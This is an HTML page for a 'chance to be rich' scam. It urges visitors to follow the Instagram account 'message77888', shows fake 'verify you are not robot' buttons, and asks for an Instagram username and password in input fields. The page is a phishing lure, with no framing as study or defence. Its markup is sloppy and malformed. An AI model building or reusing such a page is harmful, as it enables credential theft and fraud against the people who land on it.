<!doctype html>
<html>
  
  <title>chance for rich</title>
  
  
  <head>
<html>try your chance to be come rich</html>
<p>this is for lucky people and that can be won by you why not to do this?</p>
<h1>this is the chance suggested for you and that is chance only to be rich in short time of period if have a chance touch continue button suggested below</h1>
<h2>give your instagram account username firstly </h2
<h4>follow the account suggested for you username is given below</h4>
<h5> "message77888" follow the account and verify you are not robot</h5>
  <a href="https://www.instagram.com/message77888?igsh=MXI4OTdnMWtzZTFjdg==" class="instagram-link">link to instagram</a>
  <h6>follow the account carefully </h6>
     <h6>caution  don't tried to fraud that is harmful in that way but in peace there is chance and you can try this chance by cliking continue button</h6>
      <h7 class="check-note">check you follow the message77888 by log in to instagram and confirm that in followning there is message77888</h7>
<style>
  button{
    background-color: yellow;
    color:blue;
    height:200px;
    width:300px;
    padding-top:1px;
    font-size:50px;
    margin-bottom:30px;
    margin-top:30px;
  }
  .continue-button{
    margin-left:200px;
    cursor:pointer;
    background-color:yellow;
    border-radius:20px;
    border-color:green;
    
  }
  
  .username-bar{
    margin-top:100px;
    height:200px;
    border-radius:20px;
    cursor:pointer;
    color:black;
    padding-left:20px;
    font-style:italic;
    width:520px;
    margin-right:50px;
    font-size:50px;
    margin-bottom:0px;
    border-color:pink;
  }
    
    
  
  .password-bar{
    margin-right:30px;
    width:520px;
    height:200px;
    font-style:italic;
    border-radius:50px;
    padding-left:20px;
    margin-top:100px;
    margin-bottom:50px;
    font-size:45px;
    border-color:red;
  }
  
  .verify-button{
    background-color:black;
    color:white;
    border-radius:5px;
    margin-left:400px;
    margin-bottom:10px;
    margin-right:75px;
    
  }
  
  .instagram-link{
    color:#e329cf;
    font-size: 20px;
    
    
    
  }
  
  .check-note{
      
      font-size:35px;
      
      
      
      
      
      
  }
      
      
      checked-notice{
        font-size:60px;  
          margin-top:20px;
          width:300px;
          
          
      }
      
    .check-box{
        
     width:75px;   
    height:75px;    
     margin-right:100px;   
            
    }  
      
      
      
      
      
  
  
  
  
  
  
  
  
  
  
  
  

</style></head>
  <body> <a class="checked-notice" href="https://www.google.com/url?sa=t&source=web&rct=j&opi=89978449&url=https://www.instagram.com/accounts/login/%3Fhl%3Den&ved=2ahUKEwieloOrm72IAxU1-QIHHYpWIjEQFnoECAkQAQ&usg=AOvVaw22wbeKu9CbUP9Ki54NoHiP">     check may i follow?</a>


      <body>this is chance only you have te become rich </body></body>
         

  
  <button class="continue-button"><a href="Insta2.html">continue</a></button>

      
    
    <button class="verify-button">verify you are not robot</button>
    
    
  <input class="check-box" type="checkbox">

  <input class="username-bar" type="text" placeholder="username">





  
  
  
  <input class="password-bar" type="text" placeholder="insta.password">
  
  

  
  
  
  
  
  <p>  there are two buttons if you touch continue you go directly our website but you click on next you can interact with us for security and more registration systems.</p>
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  </html>
  
  
    
  
    
      
    
  

    
    
    
    
    
    
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  